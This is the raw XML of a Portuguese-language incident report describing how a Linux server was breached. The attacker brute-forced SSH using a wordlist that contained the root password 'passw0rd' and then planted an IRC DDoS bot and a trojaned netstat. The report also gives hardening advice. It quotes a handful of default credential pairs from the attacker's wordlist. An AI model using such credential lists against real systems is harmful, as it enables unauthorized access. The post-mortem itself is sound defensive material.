              <text:p text:style-name="P5">Em <text:span text:style-name="FileName">/var/tmp</text:span> foi baixado um tal <text:span text:style-name="FileName">usr.tar.gz</text:span>, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando <text:span text:style-name="FileName">/bin/netstat</text:span> também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o <text:span text:style-name="Command">ksysguard</text:span>. Adiante explicaremos o que um cracker faz com isso.</text:p>
            </text:list-item>
          </text:list>
          <text:p text:style-name="List">Mas o mais interessante foi o <text:span text:style-name="FileName">x.tar.gz</text:span> baixado. Continha dois executáveis chamados <text:span text:style-name="Command">find</text:span> e <text:span text:style-name="Command">take</text:span>, o script chamado simplesmente de <text:span text:style-name="Command">x</text:span>, e um arquivo muito especial de nome <text:span text:style-name="FileName">code.conf</text:span>. Lendo o simplíssimo script <text:span text:style-name="Command">x</text:span>, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando <text:span text:style-name="Command">find</text:span> varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando <text:span text:style-name="Command">take</text:span>, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo <text:span text:style-name="FileName">code.conf</text:span> para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.</text:p>
          <text:p text:style-name="List">Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.</text:p>
          <text:p text:style-name="P4">Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do <text:span text:style-name="FileName">code.conf</text:span> e entre suas mais de 18 mil linhas encontramos estas:</text:p>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr1" draw:name="passwds" text:anchor-type="paragraph" svg:y="1cm" fo:min-width="3.711cm" style:rel-width="19%" draw:z-index="8"><draw:text-box fo:min-height="4.295cm"><text:p text:style-name="P3"><text:span text:style-name="T10">root passw0rd</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">root pa55word</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">root pa55w0rd</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">sapdb sapdb</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">apache apache</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">apache 123456</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">apache2 apache</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">apache2 apache2</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">apache2 apache123</text:span></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body">Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima <text:span text:style-name="Command">passw0rd</text:span> (com zero no lugar do 'o')! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.</text:p>
          <text:p text:style-name="Text_20_body">Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são responsabilidade do administrador, e não tanto de um software de segurança em especial.</text:p>
        </text:section>
      </text:section>
      <text:section text:style-name="Sect3" text:name="Reinstalação">
        <text:h text:style-name="Section_20_Title" text:outline-level="1">A Reinstalação da Máquina</text:h>
        <text:p text:style-name="Text_20_body">Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:</text:p>
        <text:list text:style-name="L2">
          <text:list-item>
            <text:p text:style-name="P6">Só instalamos pacotes que sabíamos que seriam usados. Nem pensar em instalação completa.</text:p>
          </text:list-item>
          <text:list-item>
            <text:p text:style-name="P6">Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.</text:p>
          </text:list-item>
          <text:list-item>
            <text:p text:style-name="P6">Criamos regras para o <text:span text:style-name="Command">iptables</text:span> fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).</text:p>
          </text:list-item>
          <text:list-item>
            <text:p text:style-name="P6">Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.</text:p>
          </text:list-item>
          <text:list-item>
            <text:p text:style-name="P6">Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando <text:span text:style-name="Command">su</text:span>. Isso funciona como uma restrição dupla para administrar a máquina.</text:p>
          </text:list-item>
          <text:list-item>
            <text:p text:style-name="P6">E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.</text:p>
          </text:list-item>
          <text:list-item>
            <text:p text:style-name="P6">As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.</text:p>
          </text:list-item>
        </text:list>
        <text:p text:style-name="P7"/>
      </text:section>
      <text:section text:style-name="Sect3" text:name="Porque">
        <text:h text:style-name="Section_20_Title" text:outline-level="1">Por que o Cracker Ataca ?</text:h>
        <text:p text:style-name="Text_20_body">Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos mitnickianos, nem financeiros, nem algo que o exaltasse perante outros crackers. Só Freud explica...</text:p>
        <text:p text:style-name="Text_20_body">Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores atacados enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.</text:p>
        <text:p text:style-name="Text_20_body"/>
        <text:p text:style-name="Text_20_body"/>
        <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr5" draw:name="DDoS" text:anchor-type="paragraph" svg:x="3.641cm" svg:y="0.019cm" svg:width="10.892cm" svg:height="8.969cm" draw:z-index="10"><draw:object xlink:href="./Object 2" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><draw:image xlink:href="./ObjectReplacements/Object 2" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/></draw:frame></text:p>
        <text:p text:style-name="Text_20_body"/>
        <text:p text:style-name="Text_20_body">Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em <text:span text:style-name="T13">http://grc.com/dos/grcdos.htm</text:span>, e é leitura obrigatória a qualquer um que se interessa por segurança.</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Verdana" svg:font-family="Verdana" style:font-family-generic="swiss"/>
    <style:font-face style:name="Bitstream Vera Sans Mono1" svg:font-family="'Bitstream Vera Sans Mono'" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Bitstream Vera Sans Mono" svg:font-family="'Bitstream Vera Sans Mono'" style:font-adornments="Bold" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Lucida Console1" svg:font-family="'Lucida Console'" style:font-adornments="Bold" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Lucida Console" svg:font-family="'Lucida Console'" style:font-adornments="Normal"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Arial1" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/>
    <style:font-face style:name="Arial2" svg:font-family="Arial" style:font-adornments="Negrito" style:font-family-generic="swiss" style:font-pitch="variable"/>
    <style:font-face style:name="Arial" svg:font-family="Arial" style:font-adornments="Normal" style:font-family-generic="swiss" style:font-pitch="variable"/>
    <style:font-face style:name="Bitstream Vera Sans1" svg:font-family="'Bitstream Vera Sans'" style:font-adornments="Bold" style:font-family-generic="swiss" style:font-pitch="variable"/>
    <style:font-face style:name="Bitstream Vera Sans" svg:font-family="'Bitstream Vera Sans'" style:font-adornments="Roman"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pt" fo:country="BR"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text-properties style:font-name="Bitstream Vera Sans" fo:font-size="9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fo:font-size="14pt" style:font-size-asian="14pt" style:font-size-complex="14pt"/>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paragraph-properties fo:text-align="justify" style:justify-single-word="false"/>
      <style:text-properties style:font-name-complex="Tahoma1"/>
    </style:style>
    <style:style style:name="Numbering_20_1" style:display-name="Numbering 1" style:family="paragraph" style:parent-style-name="List" style:class="list">
      <style:paragraph-properties fo:margin-left="0.635cm" fo:margin-right="0cm" fo:margin-top="0.508cm" fo:margin-bottom="0.203cm"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Header" style:family="paragraph" style:parent-style-name="Standard" style:class="extra">
      <style:paragraph-properties text:number-lines="false" text:line-number="0">
        <style:tab-stops>
          <style:tab-stop style:position="7.324cm" style:type="center"/>
          <style:tab-stop style:position="14.64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font-name="Bitstream Vera Sans1"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24cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Bitstream Vera San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4.741cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Arial"/>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274cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Arial" fo:font-size="10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Lucida Console" fo:font-size="8pt" style:font-name-asian="Courier New" style:font-size-asian="10pt" style:font-name-complex="Courier New" style:font-size-complex="10pt"/>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default-outline-level="1">
      <style:paragraph-properties fo:line-height="200%" text:number-lines="false" text:line-number="0"/>
      <style:text-properties fo:text-transform="capitalize" style:font-name="Bitstream Vera Sans1" fo:font-size="14pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="Appendix_20_Title" style:display-name="Appendix Title" style:family="paragraph" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:line-height="200%"/>
      <style:text-properties fo:text-transform="capitalize" fo:font-size="14pt"/>
    </style:style>
    <style:style style:name="Section1_20_Title" style:display-name="Section1 Title" style:family="paragraph" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:line-height="200%"/>
      <style:text-properties fo:text-transform="capitalize" fo:font-size="14pt"/>
    </style:style>
    <style:style style:name="Section2_20_Title" style:display-name="Section2 Title" style:family="paragraph" style:next-style-name="Text_20_body" style:default-outline-level="2">
      <style:paragraph-properties fo:line-height="200%">
        <style:tab-stops/>
      </style:paragraph-properties>
      <style:text-properties fo:text-transform="capitalize" style:font-name="Arial2" fo:font-size="11pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="Section3_20_Title" style:display-name="Section3 Title" style:family="paragraph" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:line-height="200%"/>
      <style:text-properties fo:text-transform="capitalize" style:font-name="Arial2" fo:font-size="10pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="Section4_20_Title" style:display-name="Section4 Title" style:family="paragraph" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:line-height="200%"/>
      <style:text-properties fo:text-transform="capitalize" fo:font-size="12pt"/>
    </style:style>
    <style:style style:name="Section5_20_Title" style:display-name="Section5 Title" style:family="paragraph" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:line-height="200%"/>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style:font-name="Bitstream Vera Sans1" fo:font-size="20pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="Document_20_SubTitle" style:display-name="Document SubTitle" style:family="paragraph" style:parent-style-name="Document_20_Title" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:margin-left="3.302cm" fo:margin-right="3.302cm" fo:text-indent="0cm" style:auto-text-indent="false"/>
      <style:text-properties fo:font-size="13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class="text">
      <style:paragraph-properties fo:margin-left="1cm" fo:margin-right="0cm" fo:text-indent="-4.5cm" style:auto-text-indent="false">
        <style:tab-stops>
          <style:tab-stop style:position="0cm"/>
        </style:tab-stops>
      </style:paragraph-properties>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Text_20_body_20_justified" style:display-name="Text body justified" style:family="paragraph" style:parent-style-name="Standard"/>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fo:text-align="center" style:justify-single-word="false" fo:text-indent="0cm" style:auto-text-indent="false"/>
    </style:style>
    <style:style style:name="Heading1" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0.42cm" fo:margin-bottom="0.21cm"/>
    </style:style>
    <style:style style:name="Heading2" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0.42cm" fo:margin-bottom="0.21cm"/>
    </style:style>
    <style:style style:name="Dimension_20_Line" style:display-name="Dimension Line" style:family="paragraph" style:parent-style-name="Standard"/>
    <style:style style:name="Default_7e_LT_7e_Gliederung_20_1" style:display-name="Default~LT~Gliederung 1" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0.953cm" fo:margin-right="0cm" fo:margin-top="0.282cm" fo:margin-bottom="0cm" fo:line-height="106%"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1" fo:font-size="32pt" fo:font-style="normal" fo:text-shadow="none"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Default_7e_LT_7e_Gliederung_20_2" style:display-name="Default~LT~Gliederung 2" style:family="paragraph" style:parent-style-name="Default_7e_LT_7e_Gliederung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agraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0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1" fo:font-size="44pt" fo:font-style="normal" fo:text-shadow="none" style:text-underline-style="none" fo:font-weight="normal" style:font-name-asian="Arial1" style:font-size-asian="44pt" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Arial1" style:font-size-complex="44pt" style:font-style-complex="normal" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="Default_7e_LT_7e_Untertitel" style:display-name="Default~LT~Untertitel" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0.282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1" fo:font-size="32pt" fo:font-style="normal" fo:text-shadow="none"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Default_7e_LT_7e_Notizen" style:display-name="Default~LT~Notizen" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0.159cm" fo:margin-bottom="0cm" fo:line-height="106%"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Default_7e_LT_7e_Hintergrundobjekte" style:display-name="Default~LT~Hintergrundobjekte" style:family="paragraph">
      <style:paragraph-properties style:text-autospace="none"/>
    </style:style>
    <style:style style:name="Default_7e_LT_7e_Hintergrund" style:display-name="Default~LT~Hintergrund" style:family="paragraph">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false" style:text-autospace="none"/>
    </style:style>
    <style:style style:name="WW-Title" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0cm" fo:margin-bottom="0cm" fo:line-height="106%" fo:text-align="center"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font-name="Arial1" fo:font-size="44pt" fo:font-style="normal" fo:text-shadow="none" style:text-underline-style="none" fo:font-weight="normal" style:font-name-asian="Arial1" style:font-size-asian="44pt" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Arial1" style:font-size-complex="44pt" style:font-style-complex="normal" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="Background_20_objects" style:display-name="Background objects" style:family="paragraph">
      <style:paragraph-properties style:text-autospace="none"/>
    </style:style>
    <style:style style:name="Background" style:family="paragraph">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false" style:text-autospace="none"/>
    </style:style>
    <style:style style:name="Notes" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0.159cm" fo:margin-bottom="0cm" fo:line-height="106%" fo:text-align="start" style:justify-single-word="false" fo:text-indent="0cm" style:auto-text-indent="false" style:text-autospace="non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31600" style:text-outline="false" style:text-line-through-style="none"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style>
    <style:style style:name="Outline_20_1" style:display-name="Outline 1" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0.953cm" fo:margin-right="0cm" fo:margin-top="0.282cm" fo:margin-bottom="0cm" fo:line-height="106%" fo:text-align="start" style:justify-single-word="false" fo:text-indent="0cm" style:auto-text-indent="false" style:text-autospace="none">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fo:color="#000000" style:text-outline="false" style:text-line-through-style="none" style:font-name="Arial1" fo:font-size="32pt" fo:font-style="normal" fo:text-shadow="none" style:text-underline-style="none" fo:font-weight="normal" style:font-name-asian="Arial1" style:font-size-asian="32pt" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Arial1" style:font-size-complex="32pt" style:font-style-complex="normal" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="Outline_20_2" style:display-name="Outline 2" style:family="paragraph" style:parent-style-name="Outline_20_1">
      <style:paragraph-properties fo:margin-left="2.064cm" fo:margin-right="0cm" fo:margin-top="0.245cm" fo:margin-bottom="0cm" fo:text-indent="0cm" style:auto-text-indent="false">
        <style:tab-stops>
          <style:tab-stop style:position="-1.588cm"/>
          <style:tab-stop style:position="0.953cm"/>
          <style:tab-stop style:position="3.493cm"/>
          <style:tab-stop style:position="6.033cm"/>
          <style:tab-stop style:position="8.573cm"/>
          <style:tab-stop style:position="11.113cm"/>
          <style:tab-stop style:position="13.653cm"/>
          <style:tab-stop style:position="16.193cm"/>
          <style:tab-stop style:position="18.733cm"/>
          <style:tab-stop style:position="21.273cm"/>
          <style:tab-stop style:position="23.813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fo:text-indent="0cm" style:auto-text-indent="false">
        <style:tab-stops>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 style:position="21.59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 style:position="19.05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3.81cm"/>
          <style:tab-stop style:position="-1.27cm"/>
          <style:tab-stop style:position="1.27cm"/>
          <style:tab-stop style:position="3.81cm"/>
          <style:tab-stop style:position="6.35cm"/>
          <style:tab-stop style:position="8.89cm"/>
          <style:tab-stop style:position="11.43cm"/>
          <style:tab-stop style:position="13.97cm"/>
          <style:tab-stop style:position="16.51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Emphasis" style:family="text">
      <style:text-properties fo:font-style="italic" fo:font-weight="bold"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style:font-name="Lucida Console1" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="Application" style:family="text">
      <style:text-properties fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="FileName" style:family="text">
      <style:text-properties fo:color="#008000"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style:font-name="Bitstream Vera Sans Mono"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ffff99" style:background-transparency="0%" fo:padding="0.15cm" fo:border="0.002cm solid #000000" style:shadow="#808080 0.178cm 0.178cm">
        <style:background-image/>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top="1.778cm" fo:margin-bottom="1.778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BrOffice.org/2.0$Linux OpenOffice.org_project/680m7$Build-9044</meta:generator>
    <dc:title>História de um Ataque</dc:title>
    <dc:subject>Relato sobre um ataque bem sucedido a um servidor Linux</dc:subject>
    <meta:initial-creator>Avi Alkalay</meta:initial-creator>
    <meta:creation-date>2005-11-22T00:08:25</meta:creation-date>
    <dc:creator>Avi Alkalay</dc:creator>
    <dc:date>2006-10-17T17:02:00</dc:date>
    <dc:language>pt-BR</dc:language>
    <meta:editing-cycles>53</meta:editing-cycles>
    <meta:editing-duration>P3DT2H56M27S</meta:editing-duration>
    <meta:template xlink:type="simple" xlink:actuate="onRequest" xlink:role="template" xlink:href="/C:/Documents%20and%20Settings/Administrator/Application%20Data/OpenOffice.org2/user/template/DocBookTemplate.stw" xlink:title="DocBookTemplate" meta:date="2005-11-22T00:08:25"/>
    <meta:user-defined meta:name="Info 1"/>
    <meta:user-defined meta:name="Info 2"/>
    <meta:user-defined meta:name="Info 3"/>
    <meta:user-defined meta:name="Info 4"/>
    <meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="2" meta:page-count="6" meta:paragraph-count="119" meta:word-count="2531" meta:character-count="1534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svg:stroke-width="0.1cm" svg:stroke-color="#0000ff" draw:marker-start-width="0.35cm" draw:marker-end-width="0.35cm" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" fo:padding-top="0.175cm" fo:padding-bottom="0.175cm" fo:padding-left="0.3cm" fo:padding-right="0.3cm"/>
    </style:style>
    <style:style style:name="gr2" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="none" draw:fill="gradient" draw:fill-color="#9ad9ff" draw:fill-gradient-name="Gradient_20_26" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr3" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="none" draw:fill="gradient" draw:fill-color="#9ad9ff" draw:fill-gradient-name="Seta_20_pra_20_Baixo"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none" draw:fill="gradient" draw:fill-color="#9ad9ff" draw:fill-gradient-name="Gradient_20_27" draw:textarea-horizontal-align="left"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draw:stroke="none" draw:fill="gradient" draw:fill-color="#9ad9ff" draw:fill-gradient-name="Gradient_20_28" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr6"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7" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="none" svg:stroke-color="#000000" draw:fill="none" draw:fill-color="#ffffff" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" draw:auto-grow-height="true" draw:auto-grow-width="false" fo:min-height="0cm" fo:min-width="4.077cm"/>
    </style:style>
    <style:style style:name="gr8" style:family="graphic" style:parent-style-name="objectwithoutfill">
      <style:graphic-properties svg:stroke-width="0.05cm" draw:marker-start-width="0.275cm" draw:marker-end="Arrow" draw:marker-end-width="0.275cm" draw:fill="none" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" fo:padding-top="0.15cm" fo:padding-bottom="0.15cm" fo:padding-left="0.275cm" fo:padding-right="0.275cm"/>
    </style:style>
    <style:style style:name="gr9" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#009800" draw:fill-gradient-name="Gradient_20_7"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35cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#008000" draw:fill-gradient-name="Gradient_20_8"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35cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#005100" draw:fill-gradient-name="Gradient_20_9" draw:textarea-horizontal-align="left"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35cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#b1b100" draw:fill-gradient-name="Gradient_20_10"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none" svg:stroke-color="#000000" draw:fill="none" draw:fill-color="#ffffff" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" draw:auto-grow-height="true" draw:auto-grow-width="false" fo:min-height="0cm" fo:min-width="4.718cm"/>
    </style:style>
    <style:style style:name="gr14" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#ffad2c" draw:fill-gradient-name="Gradient_20_15"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35cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#ffad2c" draw:fill-gradient-name="Gradient_20_16" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="P1" style:family="paragraph">
      <style:paragraph-properties fo:text-align="center"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph">
      <style:paragraph-properties style:writing-mode="lr-tb"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-indent="0cm"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph">
      <style:text-properties fo:color="#000080" fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph">
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="13pt" fo:font-weight="normal"/>
    </style:style>
    <style:style style:name="P6" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
    </style:style>
    <style:style style:name="P7" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="P8" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="center" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt"/>
    </style:style>
    <style:style style:name="T1" style:family="text">
      <style:text-properties fo:color="#000080" fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="13pt" fo:font-weight="normal"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8pt" fo:text-shadow="1pt 1pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T4" style:family="text">
      <style:text-properties fo:font-family="'Bitstream Vera Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="8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line draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:x1="10.901cm" svg:y1="3.245cm" svg:x2="8.901cm" svg:y2="3.245cm">
          <text:p text:style-name="P3"/>
        </draw:line>
        <draw:line draw:style-name="gr1" draw:text-style-name="P1" draw:layer="layout" svg:x1="4.656cm" svg:y1="3.245cm" svg:x2="2.656cm" svg:y2="3.245cm">
          <text:p text:style-name="P3"/>
        </draw:line>
        <draw:g>
          <draw:custom-shape draw:style-name="gr2" draw:text-style-name="P2" draw:layer="layout" svg:width="2.017cm" svg:height="0.983cm" svg:x="6.682cm" svg:y="2.18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1.583cm" svg:height="1.257cm" svg:x="4.361cm" svg:y="2.512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1.556cm" svg:height="0.952cm" svg:x="5.373cm" svg:y="2.872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0.958cm" svg:height="0.557cm" svg:x="8.227cm" svg:y="2.408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1.834cm" svg:height="1.191cm" svg:x="5.71cm" svg:y="1.906cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 21600 21600" draw:glue-points="10800 0 3160 3160 0 10800 3160 18440 10800 21600 18440 18440 21600 10800 18440 3160" draw:text-areas="3200 3200 18400 18400" draw:type="ellipse"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr5" draw:text-style-name="P2" draw:layer="layout" svg:width="1.861cm" svg:height="0.865cm" svg:x="7.387cm" svg:y="2.828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2.317cm" svg:height="1.171cm" svg:x="6.344cm" svg:y="2.782cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 21600 21600" draw:glue-points="10800 0 3160 3160 0 10800 3160 18440 10800 21600 18440 18440 21600 10800 18440 3160" draw:text-areas="3200 3200 18400 18400" draw:type="ellipse"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P2" draw:layer="layout" svg:width="1.29cm" svg:height="1.136cm" svg:x="4.846cm" svg:y="2.09cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 21600 21600" draw:glue-points="10800 0 3160 3160 0 10800 3160 18440 10800 21600 18440 18440 21600 10800 18440 3160" draw:text-areas="3200 3200 18400 18400" draw:type="ellipse"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr3" draw:text-style-name="P2" draw:layer="layout" svg:width="1.049cm" svg:height="0.78cm" svg:x="4.248cm" svg:y="2.465cm">
            <text:p text:style-name="P3"/>
